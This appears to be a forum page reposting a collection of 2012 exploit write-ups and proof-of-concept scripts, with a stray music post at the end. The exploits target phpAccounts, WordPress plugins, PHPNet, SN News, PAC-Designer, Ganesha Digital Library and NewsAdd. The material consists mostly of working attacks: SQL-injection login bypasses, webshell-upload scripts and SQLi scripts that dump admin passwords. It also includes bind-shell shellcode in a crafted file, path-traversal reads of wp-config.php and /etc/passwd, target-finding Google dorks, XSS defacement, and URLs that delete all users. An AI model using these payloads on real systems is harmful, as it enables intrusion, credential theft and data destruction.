# Old app, still fun.
Auth. Bypass:
http://<server>/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>
Upload php shell in preferences
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences
Acess shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>
---- Python PoC ---------
#!/usr/bin/python
import re, mechanize
import urllib, sys
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
print "[*] Usage: poc.py <RHOST> <RCMD>"
exit(0)
rhost = sys.argv[1]
rcmd = sys.argv[2]
print "[*] Bypassing Login ."
try:
br = mechanize.Browser()
br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
assert br.viewing_html()
br.select_form(name="loginForm")
br.select_form(nr=0)
br.form['Login_Username'] = "x' or '1'#"
br.form['Login_Password'] = "pwnd"
print "[*] Triggering SQLi .."
br.submit()
except:
print "[*] Oups..Something happened"
exit(0)
print "[*] Uploading Shell ..."
try:
br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
assert br.viewing_html()
br.select_form(nr=0)
br.form["Preferences[LETTER_HEADER]"] = 'test'
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
br.submit(nr=2)
except:
print "[*] Upload didn't work"
exit(0)
print "[*] Command Executed\n"
try:
shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
print shell.read()
except:
print "[*] Oups."
exit(0) -
Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability
##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File
Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Date : 31-05-2012
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
Read source [CTRL-u]
http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd
Read source [CTRL-u]Sursa: Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability
-
Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload
##################################################
# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File
Upload Vulnerability
# Version : 2.1
# Link : http://wordpress.org/extend/plugins/rbxgallery/
# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/rbxgallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php";
$uploadfile2="db.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('images[0]'=>"@$uploadfile",
'images[1]'=>"@$uploadfile2",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php
lo.php
<?php
phpinfo();
?>Sursa: Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload
-
PHPNet <= 1.8 (ler.php) SQL Injection
<?php
# Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
# Exploit Author: WhiteCollarGroup
# Date: 06th 06 2012
# Vendor homepage: http://www.phpnet.com.br/
# Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos
# Google Dork: intext:"Powerd by Nielson Rocha"
# Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir"
# Version: 1.8
# Tested on: Debian GNU/Linux,Windows 7 Ultimate
/*
We discovered multiple vulnerabilities on the system.
~> SQL Injection
This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.
ler.php?id=[SQLi]
imprimir.php?id=[SQLi]
imagem.php?id=[SQLi]
Usage:
php file.php http://server/path/
~> Login bypass
In login page, you can bypass the login using "SQLi strings".
Go to http://server/path/admin/login.php
Login: ' or 1=1-- wc
Pass: wcgroup
~> Arbitraty File Upload
After open administration panel, try to add a new article.
Use the upload form to upload your webshell.
After posting, access:
http://server/path/tmp/your_shell_filename.php
~> Information disclosure
Access:
http://server/path/conf/config.ini
~> XSS Stored (persistent)
When posting a new article, you can post (D)HTML/Javascript codes on the page.
*/
function _printf($str) {
echo $str."\n";
}
function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
set_time_limit(0);
error_reporting(E_ERROR & E_USER_WARNING);
@ini_set('default_socket_timeout', 30);
echo "\n";
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com";
if($argc!=2) {
_printf("Usage:");
_printf("php $argv[0] <target>");
_printf("Example:");
_printf("php $argv[0] http://site.com/path/");
exit;
}
$target = $argv[1];
if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra
$target .= "/";
}
$inject = $target . "ler.php?id=-0'%20";
$token = uniqid();
$token_hex = hex($token);
// vamos agora obter os seguintes dados: user() version()
echo "\n\n[*] Trying to get informations...\n";
$infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- "));
$infos_r = array();
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
if(($user) AND ($version))
{
echo "[!] MySQL user: $user\n";
echo "[!] MySQL version: $version\n";
}
else
{
echo "[-] Error while getting informations...\n";
}
$i = 0;
while(1==1) {
$dados_r = array();
$dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- "));
preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
$login = $dados_r[1][0];
$senha = $dados_r[2][0];
if(($login) AND ($senha)) {
echo " -+-\n";
echo "[!] User: $login\n";
echo "[!] Pass: $senha\n";
$i++;
} else {
break; // exitloop
}
if($i==0) {
echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
} else {
echo " -+-\n[!] :D";
}
echo "\n";
}
?> -
SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection
##############################################################################
## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
## Google Dork: "snews/visualiza.php?id="
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 06/06/2012
## Version: 1.2
## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
## ISRAEL
##############################################################################
## Author will be not responsible for any damage.
##############################################################################
## Vulnerable Code - /admin/logar.php [4-15]:
4.$login = $_POST["login"];
5.$senha = $_POST["senha"];
6.$sql = "select * from news_adm where login='$login' AND senha='$senha'";
7.$query = mysql_query($sql);
8.$nr = mysql_num_rows($query);
9.if($nr>0){
10.$_SESSION["admin"] = "on";
11.echo "<script>
12.location.href='../'
13.</script>
14.";
15.}
## NOTE:
## As you can see there is no validation or any filter to variables $login and $senha.
## See line 6, so you can inject sql query by using $login and $senha variables.
## SQL Injection PoC:
## http://127.0.0.1/sn_news/admin/login.htm
## Login: ' or '1'='1
## Senha: ' or '1'='1
## This injection will bypass the admin login screen.
##############################################################################
# Cya
# 0x31337.net
##############################################################################Sursa: SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection
-
Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
#!/usr/bin/python -w
#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) #
# CVE: CVE-2012-2915 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ #
# OS: WinXP SP1 #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig to deep but it seems portability to other OS builds is not promising #
# due to SafeSEH and badchars in the application modules. #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988 #
# (UNKNOWN) [192.168.111.130] 9988 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:\Documents and Settings\Owner\Desktop> #
#------------------------------------------------------------------------------------#
filename="evil.PAC"
PAC1 = """<?xml version="1.0"?>
<PacDesignData>
<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>
<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>
<SymbolicSchematicData>
<Symbol>
<SymKey>153</SymKey>
<NameText>Profile 0 Ref Frequency</NameText>
<Value>"""
#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1) #
#------------------------------------------------------------------------------------#
shellcode = (
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")
#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll #
# nSEH: \xEB\x05 #
#------------------------------------------------------------------------------------#
b00m = "\x90"*20 + shellcode
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))
PAC2 = """</Value>
</Symbol>
</SymbolicSchematicData>
</PacDesignData>"""
buffer = PAC1 + payload + PAC2
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()Sursa: Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
-
-
Browser Navigation Download Trick
Another moderately interesting tidbit, I guess...
It is an important and little-known property of web browsers that one
document can always navigate other, non-same-origin windows to
arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition:
attachment, in which case, you get the original contents of the
address bar, plus a rogue download prompt attached to an unsuspecting
page that never wanted you to download that file.
PoC:
http://lcamtuf.coredump.cx/fldl/
==========
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
var w;
var once;
function doit() {
if (navigator.userAgent.indexOf('MSIE') != -1)
w = window.open('page2.html', 'foo');
else
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
setTimeout(donext, 4500);
}
function donext() {
window.open('http://199.58.85.40/download2.cgi', 'foo');
if (once != true) setTimeout(donext, 5000);
once = true;
}
</script>
==========
More info:
http://lcamtuf.blogspot.com/2012/05/yes-you-can-have-fun-with-downloads.html
It's closely related to many other fundamental, open issues with
browser UI design - but I guess it's an interesting highlight.
/mz- 1
-
-
Ganesha Digital Library 4.0 Multiple Vulnerabilities
=====================================================
Ganesha Digital Library 4.0 Multiple Vulnerabilities
=====================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities
: # Date : 30 May 2012
: # Author : X-Cisadane
: # Software Link : kmrg.itb.ac.id
: # Version : 4.x
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS
Vulnerability
: # Tested On : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew,
CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
Description :
=============
Ganesha Digital Library (GDL) is a digital library software developed by
Knowledge Management Research Group (KMRG) Institute of Technology Bandung
(ITB) in order to harness the intellectual capital (intellectual capital)
of ITB, which includes academic articles, journals, the final task, thesis,
dissertation, research results, expertise and other directory.
Dorks :
=======
inurl:"/office.php?m="
intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved
intext:This work was carried out with the aid of a grant from YLTI
Indonesia and IDRC Canada.
intitle:" - GDL 4.0"
POC :
=====
[1] NON-Persistent XSS in the Account Activation Section
There is a security flaw (NON-Persistent XSS) in the Account Activation
Section.
Activate Account in the left corner Menu. Then you'll be taken to Activate
Account Page, Fill this script : '"><script>alert(1337)</script> on the
Account Field and Code Field Then Click Activate.
[2] NON-Persistent XSS in the Search Section
XSS Script : '"><script>alert(1337)</script>
For Example :
http://server/pustaka/search.php?s=[Insert XSS Script]
[3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script]
XSS Script : '"><script>alert(1337)</script>
For Example :
Type XSS Script like this --->
http://server/office.php?m=lang&langid='"><script>alert(1337)</script>
AND PRESS ENTER!
Then you'll be taken to Error Page.
Then edit the URL like this --->
http://server/office.php?m=lang&langid=en AND PRESS
ENTER!
If it Successfull, it will appear a Message Box "1337"
P.S : Login Required!
[4] NON-Persistent XSS DEFACING
XSS Script : http://server/publisher.php?id=<script>document.body.innerHTML="<h1>XSS
Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni,
Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit
http://xcode.or.id";</script>
[5] SQL Injection on The Login Form (Gain SuperUser Access!)
Open Ganesha Digital Library 4.0 Login Page
For the example : Open http://server/login.php
On the Account Field, Fill with this Symbol : '=0#
On the Password Field Don't Fill Anything!!! Then Click Login Button.
If it Successfull, you'll be got a Superuser GDL Access!
You can try another site such as :
http://server/login.php
[6] SQL Injection on go.php?id=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
BLA&start=['SQL]
SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA
BLA&start=START ID BLA BLA BLA&node=['SQL]
For Example :
http://server/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848
http://server/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a
http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a
[7] SQL Injection on publisher.php?id=['SQL]
For Example :
http://server/publisher.php?id=%27JBPEDONFAU
[8] SQL Injection on go.php?node=['SQL]
For Example :
http://server/go.php?node='191
P.S : Login Required!
[9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0
For Example :
http://server/office.php?m=explorer&a='191&b=expand&w=0
P.S : Login Required!
[10] SQL Injection on office.php?m=user&a=['SQL]
For Example :
http://server/office.php?m=user&a='pdsony@idola.net.id&b=edit
P.S : Login Required!
[11] SQL Injction on office.php?m=workgroup&a=['SQL]&b=edit
For Example :
http://server/office.php?m=workgroup&a='1&b=edit
P.S : Login Required!
[12] SQL Injection on office.php?m=user&so=desc&sb=['SQL]
For Example :
http://server/office.php?m=user&so=desc&sb='FULL_NAME
http://server/office.php?m=user&so=asc&sb='EMAIL
http://server/office.php?m=user&so=asc&sb='GID
http://server/office.php?m=user&so=asc&sb='CONFIRM
P.S : Login Required! -
NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities
# Exploit Title: NewsAdd <=1.0 Multiple SQL Injection
# Google Dork: -----------------------------------
# Date: 2012/05/29
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql
# Version: 1.0
# Tested on: Debian GNU/Linux
Developer URL: http://tvaini.ueuo.com/
Vulnerabilities discovered by WhiteCollarGroup
www.wcgroup.host56.com
whitecollar_group@hotmail.com
If you will install NewsAdd on your system for tests, some servers have problems with tabulation.
Therefore, replace the second query:
--- begin ---
CREATE TABLE IF NOT EXISTS 'comentario' (
'id' int(11) NOT NULL AUTO_INCREMENT,
'id_noticia' int(11) NOT NULL,
'usuario' varchar(15) NOT NULL,
'comentario' text NOT NULL,
'data' datetime NOT NULL,
PRIMARY_KEY('id')
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ;
--- end ---
By this:
--- begin ---
DROP TABLE IF EXISTS `comentario`;
CREATE TABLE `comentario` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`id_noticia` int(11) NOT NULL,
`usuario` varchar(15) NOT NULL,
`comentario` text NOT NULL,
`data` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--- end ---
We discovered five SQL Injection vulnerabilities on public access.
_
|_| Vulnerabilities before login
/
| SQL Injection on the search form
\
The first vulnerability is in the search form, on index. Paste this in it:
%' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc
You will get a unique line like:
admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0
Lines are separated by commas (",") and columns, by "<=>".
In the return, we have two lines:
admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0
user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0
Here, we have the columns as follow:
email <=> username <=> md5(password) <=> admin? <=> banned?
/
| SQL Injection on comments
\
For this, you must be a user. Register on the "cadastro.php" form.
After, access:
http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
You will view a line like the previous example.
_
|_| Vulnerabilities after login
/
| Delete all posts
\
/admin/removerNoticia.php?id=0' or '1'='1&conf=sim
/
| Ban all users
\
/admin/listarUsuarios.php?acao=banir&id=0' or '1'='1
/
| Delete all users
\
/admin/removerUsuario.php?id=0' or '1'='1&conf=sim
Note that if you delete all users, you will lose access to the system.
Ce ascultati acum?
in Discutii non-IT
Posted
https://www.youtube.com/watch?v=06WBbdaBWi8&feature=g-all-u